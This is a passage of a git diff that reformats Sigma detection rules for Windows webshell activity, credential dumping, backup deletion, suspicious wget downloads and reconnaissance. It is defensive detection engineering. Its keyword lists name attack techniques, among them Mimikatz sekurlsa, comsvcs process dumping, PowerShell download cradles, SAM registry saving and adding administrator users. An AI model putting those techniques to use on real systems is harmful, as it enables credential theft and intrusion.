-description: When configured with suitable command line arguments, w32tm can act as - a delay mechanism +description: When configured with suitable command line arguments, w32tm can act as a delay mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md - https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_w32tm: - - NewProcessName|endswith: \w32tm.exe - - OriginalFileName: w32time.dll + - NewProcessName|endswith: \w32tm.exe + - OriginalFileName: w32time.dll selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - /stripchart - '/computer:' - '/period:' diff --git a/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml index 5c9c25be3..39d22fee8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml @@ -1,8 +1,7 @@ title: Wab Execution From Non Default Location id: 395907ee-96e5-4666-af2e-2ca91688e151 status: test -description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft - Address Book Import Tool) from non default locations as seen with bumblebee activity +description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \wab.exe - \wabmig.exe filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\WinSxS\ - C:\Program Files\Windows Mail\ - C:\Program Files (x86)\Windows Mail\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml b/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml index 0febb7b81..be3a30e7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wab_unusual_parents.yml @@ -1,9 +1,7 @@ title: Wab/Wabmig Unusual Parent Or Child Processes id: 63d1ccc0-2a43-4f4b-9289-361b308991ff status: test -description: Detects unusual parent or children of the wab.exe (Windows Contacts) - and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used - with bumblebee activity +description: Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity references: - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime @@ -23,16 +21,18 @@ detection: Channel: Security selection_parent: ParentProcessName|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe - NewProcessName|endswith: + NewProcessName|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentProcessName|endswith: - \wab.exe - - \wabmig.exe + - \wabmig.exe # (Microsoft Address Book Import Tool) condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml b/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml index db4f4b60f..808fa3378 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml @@ -1,13 +1,10 @@ title: SystemStateBackup Deleted Using Wbadmin.EXE id: 89f75308-5b1b-4390-b2d8-d6b2340efaf8 status: test -description: 'Deletes the Windows systemstatebackup using wbadmin.exe. - +description: | + Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. - This may only be successful on server platforms that have Windows Backup enabled. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 @@ -24,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wbadmin.exe - - OriginalFileName: WBADMIN.EXE + - NewProcessName|endswith: \wbadmin.exe + - OriginalFileName: WBADMIN.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'delete ' - 'systemstatebackup ' - -keepVersions:0 diff --git a/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml b/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml index 00582ab26..da8dc857b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webdav_lnk_execution.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious WebDAV LNK Execution id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe related: - - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 - type: similar + - id: f0507c0f-a3a2-40f5-acc6-7f543c334993 + type: similar status: experimental description: Detects possible execution via LNK file accessed on a WebDAV server. references: @@ -22,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \DavWWWRoot\ + CommandLine|contains: \DavWWWRoot\ ParentProcessName|endswith: \explorer.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml index d42777604..257cf7f45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_chopper.yml @@ -1,8 +1,7 @@ title: Chopper Webshell Process Pattern id: fa3c117a-bc0d-416e-a31b-0c0e80653efb status: test -description: Detects patterns found in process executions cause by China Chopper like - tiny (ASPX) webshells +description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ author: Florian Roth (Nextron Systems), MSTI (query) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_origin: - - NewProcessName|endswith: \w3wp.exe - - ParentProcessName|endswith: \w3wp.exe + - NewProcessName|endswith: \w3wp.exe + - ParentProcessName|endswith: \w3wp.exe selection_cmdline: - CommandLine|contains: + CommandLine|contains: - '&ipconfig&echo' - '&quser&echo' - '&whoami&echo' diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml index 7733f0d52..7c77efb44 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_hacking.yml @@ -1,11 +1,8 @@ title: Webshell Hacking Activity Patterns id: 4ebc877f-4612-45cb-b3a5-8e3834db36c9 status: test -description: 'Detects certain parent child patterns found in cases in which a web - shell is used to perform certain credential dumping or exfiltration activities - on a compromised system - - ' +description: | + Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system references: - https://youtu.be/7aemGhaE9ds?t=641 author: Florian Roth (Nextron Systems) @@ -21,6 +18,7 @@ logsource: category: process_creation product: windows detection: + # Webserver process_creation: EventID: 4688 Channel: Security @@ -40,55 +38,64 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME + # Suspicious child processes ParentProcessName|endswith: - \java.exe - \javaw.exe selection_child_1: - CommandLine|contains|all: + # Process dumping + CommandLine|contains|all: - rundll32 - comsvcs selection_child_2: - CommandLine|contains|all: + # Winrar exfil + CommandLine|contains|all: - ' -hp' - ' a ' - ' -m' selection_child_3: - CommandLine|contains|all: + # User add + CommandLine|contains|all: - net - ' user ' - ' /add' selection_child_4: - CommandLine|contains|all: + CommandLine|contains|all: - net - ' localgroup ' - ' administrators ' - /add selection_child_5: - NewProcessName|endswith: + NewProcessName|endswith: + # Credential stealing - \ntdsutil.exe + # AD recon - \ldifde.exe - \adfind.exe + # Process dumping - \procdump.exe - \Nanodump.exe + # Destruction / ransom groups - \vssadmin.exe - \fsutil.exe selection_child_6: - CommandLine|contains: - - ' -decode ' - - ' -NoP ' - - ' -W Hidden ' - - ' /decode ' - - ' /ticket:' - - ' sekurlsa' - - .dmp full - - .downloadfile( - - .downloadstring( - - FromBase64String - - process call create - - 'reg save ' + # SUspicious patterns + CommandLine|contains: + - ' -decode ' # Used with certutil + - ' -NoP ' # Often used in malicious PowerShell commands + - ' -W Hidden ' # Often used in malicious PowerShell commands + - ' /decode ' # Used with certutil + - ' /ticket:' # Rubeus + - ' sekurlsa' # Mimikatz + - .dmp full # Process dumping method apart from procdump + - .downloadfile( # PowerShell download command + - .downloadstring( # PowerShell download command + - FromBase64String # PowerShell encoded payload + - process call create # WMIC process creation + - 'reg save ' # save registry SAM - syskey extraction - whoami /priv condition: process_creation and (1 of selection_webserver_* and 1 of selection_child_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml index e5da6e5b7..eb8008c82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml @@ -1,8 +1,7 @@ title: Webshell Detection With Command Line Keywords id: bed2a484-9348-4143-8a8a-b801c979301c status: test -description: Detects certain command line parameters often used during reconnaissance - activity via web shells +description: Detects certain command line parameters often used during reconnaissance activity via web shells references: - https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html - https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/ @@ -38,7 +37,7 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - catalina.jar - CATALINA_HOME ParentProcessName|endswith: @@ -48,58 +47,58 @@ detection: OriginalFileName: - net.exe - net1.exe - CommandLine|contains: + CommandLine|contains: - ' user ' - ' use ' - ' group ' selection_susp_ping_utility: OriginalFileName: ping.exe - CommandLine|contains: ' -n ' + CommandLine|contains: ' -n ' selection_susp_change_dir: - CommandLine|contains: - - '&cd&echo' - - 'cd /d ' + CommandLine|contains: + - '&cd&echo' # china chopper web shell + - 'cd /d ' # https://www.computerhope.com/cdhlp.htm selection_susp_wmic_utility: OriginalFileName: wmic.exe - CommandLine|contains: ' /node:' + CommandLine|contains: ' /node:' selection_susp_misc_discovery_binaries: - - NewProcessName|endswith: - - \dsquery.exe - - \find.exe - - \findstr.exe - - \ipconfig.exe - - \netstat.exe - - \nslookup.exe - - \pathping.exe - - \quser.exe - - \schtasks.exe - - \systeminfo.exe - - \tasklist.exe - - \tracert.exe - - \ver.exe - - \wevtutil.exe - - \whoami.exe - - OriginalFileName: - - dsquery.exe - - find.exe - - findstr.exe - - ipconfig.exe - - netstat.exe - - nslookup.exe - - pathping.exe - - quser.exe - - schtasks.exe - - sysinfo.exe - - tasklist.exe - - tracert.exe - - ver.exe - - VSSADMIN.EXE - - wevtutil.exe - - whoami.exe + - NewProcessName|endswith: + - \dsquery.exe + - \find.exe + - \findstr.exe + - \ipconfig.exe + - \netstat.exe + - \nslookup.exe + - \pathping.exe + - \quser.exe + - \schtasks.exe + - \systeminfo.exe + - \tasklist.exe + - \tracert.exe + - \ver.exe + - \wevtutil.exe + - \whoami.exe + - OriginalFileName: + - dsquery.exe + - find.exe + - findstr.exe + - ipconfig.exe + - netstat.exe + - nslookup.exe + - pathping.exe + - quser.exe + - schtasks.exe + - sysinfo.exe + - tasklist.exe + - tracert.exe + - ver.exe + - VSSADMIN.EXE + - wevtutil.exe + - whoami.exe selection_susp_misc_discovery_commands: - CommandLine|contains: + CommandLine|contains: - ' Test-NetConnection ' - - dir \ + - dir \ # remote dir: dir \\C$:\windows\temp\*.exe condition: process_creation and (1 of selection_webserver_* and 1 of selection_susp_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml index d80e3bf31..36883847a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml @@ -1,14 +1,11 @@ title: Suspicious Process By Web Server Process id: 8202070f-edeb-4d31-a010-a26c72ac5600 status: test -description: 'Detects potentially suspicious processes being spawned by a web server - process which could be the result of a successfully placed web shell or exploitation - - ' +description: | + Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation references: - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim - Shelton, Nasreddine Bencherchali (Nextron Systems) +author: Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/11/11 tags: @@ -30,7 +27,7 @@ detection: - \php-cgi.exe - \php.exe - \tomcat.exe - - \UMWorkerProcess.exe + - \UMWorkerProcess.exe # https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html - \w3wp.exe - \ws_TomcatService.exe selection_webserver_characteristics_tomcat1: @@ -49,7 +46,7 @@ detection: - \java.exe - \javaw.exe selection_anomaly_children: - NewProcessName|endswith: + NewProcessName|endswith: - \arp.exe - \at.exe - \bash.exe @@ -80,16 +77,14 @@ detection: - \wscript.exe - \wusa.exe filter_main_fp_1: - CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager - "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt + CommandLine|endswith: Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt ParentProcessName|endswith: \java.exe filter_main_fp_2: - CommandLine|contains|all: + CommandLine|contains|all: - sc query - ADManager Plus ParentProcessName|endswith: \java.exe - condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children - and not 1 of filter_main_*) + condition: process_creation and (1 of selection_webserver_* and selection_anomaly_children and not 1 of filter_main_*) falsepositives: - Particular web applications may spawn a shell process legitimately level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml b/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml index fe06be222..a3bdfe885 100644 --- a/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_webshell_tool_recon.yml @@ -1,11 +1,8 @@ title: Webshell Tool Reconnaissance Activity id: f64e5c19-879c-4bae-b471-6d84c8339677 status: test -description: 'Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) - that perform reconnaissance looking for the existence of popular scripting tools - (perl, python, wget) on the system via the help commands - - ' +description: | + Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands references: - https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html author: Cian Heasley, Florian Roth (Nextron Systems) @@ -37,14 +34,14 @@ detection: - -tomcat- - \tomcat selection_webserver_characteristics_tomcat2: - CommandLine|contains: + CommandLine|contains: - CATALINA_HOME - catalina.jar ParentProcessName|endswith: - \java.exe - \javaw.exe selection_recon: - CommandLine|contains: + CommandLine|contains: - perl --help - perl -h - python --help diff --git a/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml b/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml index c2f52b9bc..fa163afc5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml +++ b/sigma/builtin/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml @@ -1,8 +1,7 @@ title: Potential Credential Dumping Via WER id: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3 status: test -description: Detects potential credential dumping via Windows Error Reporting LSASS - Shtinkering technique which uses the Windows Error Reporting to dump lsass +description: Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf @@ -20,13 +19,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Werfault.exe - - OriginalFileName: WerFault.exe + - NewProcessName|endswith: \Werfault.exe + - OriginalFileName: WerFault.exe selection_cli: - ParentUser|contains: + ParentUser|contains: # covers many language settings - AUTHORI - AUTORI - CommandLine|contains|all: + CommandLine|contains|all: + # Doc: WerFault.exe -u -p -ip -s + # Example: C:\Windows\system32\Werfault.exe -u -p 744 -ip 1112 -s 244 + # If the source process is not equal to the target process and the target process is LSASS then this is an indication of this technique + # Example: If the "-p" points the PID of "lsass.exe" and "-ip" points to a different process than "lsass.exe" then this is a sign of malicious activity - ' -u -p ' - ' -ip ' - ' -s ' @@ -37,7 +40,6 @@ detection: ParentProcessName: C:\Windows\System32\lsass.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Windows Error Reporting might produce similar behavior. In that case, check - the PID associated with the "-p" parameter in the CommandLine. + - Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the "-p" parameter in the CommandLine. level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml b/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml index b6dfa12ef..4d1e7fcda 100644 --- a/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml @@ -1,12 +1,10 @@ title: Potential ReflectDebugger Content Execution Via WerFault.EXE id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd related: - - id: 0cf2e1c6-8d10-4273-8059-738778f981ad - type: derived + - id: 0cf2e1c6-8d10-4273-8059-738778f981ad + type: derived status: experimental -description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that - is used to run files stored in the ReflectDebugger key which could be used to - store the path to the malware in order to masquerade the execution flow +description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow references: - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ @@ -24,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WerFault.exe - - OriginalFileName: WerFault.exe + - NewProcessName|endswith: \WerFault.exe + - OriginalFileName: WerFault.exe selection_cli: - CommandLine|contains: ' -pr ' + CommandLine|contains: ' -pr ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml index fd0727aa1..c3a16593b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Child Process Of Wermgr.EXE id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e related: - - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 - type: similar + - id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child - process +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe @@ -27,7 +26,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \wermgr.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \ipconfig.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml index e02596310..db0597cab 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wermgr_susp_exec_location.yml @@ -1,11 +1,10 @@ title: Suspicious Execution Location Of Wermgr.EXE id: 5394fcc7-aeb2-43b5-9a09-cac9fc5edcd5 related: - - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e - type: similar + - id: 396f6630-f3ac-44e3-bfc8-1b161bc00c4e + type: similar status: experimental -description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution - location. +description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location. references: - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - https://www.echotrail.io/insights/search/wermgr.exe @@ -23,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \wermgr.exe + NewProcessName|endswith: \wermgr.exe filter_main_legit_location: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Windows\System32\ - C:\Windows\SysWOW64\ - C:\Windows\WinSxS\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml index 5696c1726..3bc23ec62 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wget_download_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From IP Via Wget.EXE id: 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 status: experimental -description: Detects potentially suspicious file downloads directly from IP addresses - using Wget.exe +description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe references: - https://www.gnu.org/software/wget/manual/wget.html author: Nasreddine Bencherchali (Nextron Systems) @@ -17,17 +16,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wget.exe - - OriginalFileName: wget.exe + - NewProcessName|endswith: \wget.exe + - OriginalFileName: wget.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml index fac878235..937d73ab6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml @@ -1,8 +1,7 @@ title: Suspicious File Download From File Sharing Domain Via Wget.EXE id: a0d7e4d2-bede-4141-8896-bc6e237e977c status: experimental -description: Detects potentially suspicious file downloads from file sharing domains - using wget.exe +description: Detects potentially suspicious file downloads from file sharing domains using wget.exe references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wget.exe - - OriginalFileName: wget.exe + - NewProcessName|endswith: \wget.exe + - OriginalFileName: wget.exe selection_websites: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ @@ -48,12 +47,12 @@ detection: - transfer.sh - ufile.io selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_flag: - - CommandLine|re: \s-O\s - - CommandLine|contains: --output-document + - CommandLine|re: \s-O\s + - CommandLine|contains: --output-document selection_ext: - CommandLine|endswith: + CommandLine|endswith: - .ps1 - .ps1' - .ps1" diff --git a/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml b/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml index be2a73c3f..efade9eef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_where_browser_data_recon.yml @@ -1,16 +1,10 @@ title: Suspicious Where Execution id: 725a9768-0f5e-4cb3-aec2-bc5719c6831a status: test -description: 'Adversaries may enumerate browser bookmarks to learn more about compromised - hosts. - - Browser bookmarks may reveal personal information about users (ex: banking sites, - interests, social media, etc.) as well as details about - - internal network resources such as servers, tools/dashboards, or other related - infrastructure. - - ' +description: | + Adversaries may enumerate browser bookmarks to learn more about compromised hosts. + Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about + internal network resources such as servers, tools/dashboards, or other related infrastructure. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -27,10 +21,11 @@ detection: EventID: 4688 Channel: Security where_exe: - - NewProcessName|endswith: \where.exe - - OriginalFileName: where.exe + - NewProcessName|endswith: \where.exe + - OriginalFileName: where.exe where_opt: - CommandLine|contains: + CommandLine|contains: + # Firefox Data - places.sqlite - cookies.sqlite - formhistory.sqlite @@ -38,6 +33,7 @@ detection: - key4.db - key3.db - sessionstore.jsonlz4 + # Chrome Data - History - Bookmarks - Cookies diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml index d7bb0d0b2..e22236858 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_all_execution.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_main_img: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe selection_main_cli: - CommandLine|contains: + CommandLine|contains: - ' -all' - ' /all' condition: process_creation and (all of selection_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml index 2f0e4e816..3d93e6041 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_execution.yml @@ -1,8 +1,7 @@ title: Whoami Utility Execution id: e28a5a99-da44-436d-b7a0-2afc20a5f413 status: test -description: Detects the execution of whoami, which is often used by attackers after - exploitation / privilege escalation +description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \whoami.exe - - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe condition: process_creation and selection falsepositives: - Admin activity diff --git a/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml b/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml index f11b2c34e..04c66d9df 100644 --- a/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml @@ -1,11 +1,10 @@ title: Whoami.EXE Execution From Privileged Process id: 79ce34ca-af29-4d0e-b832-fc1b377020db related: - - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 - type: obsoletes + - id: 80167ada-7a12-41ed-b8e9-aa47195c66a1 + type: obsoletes status: experimental -description: Detects the execution of "whoami.exe" by privileged accounts that are - often abused by threat actors +description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://nsudo.m2team.org/en-us/ @@ -24,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: whoami.exe - - NewProcessName|endswith: \whoami.exe + - OriginalFileName: whoami.exe + - NewProcessName|endswith: \whoami.exe selection_user: SubjectUserName|contains: - AUTHORI diff --git 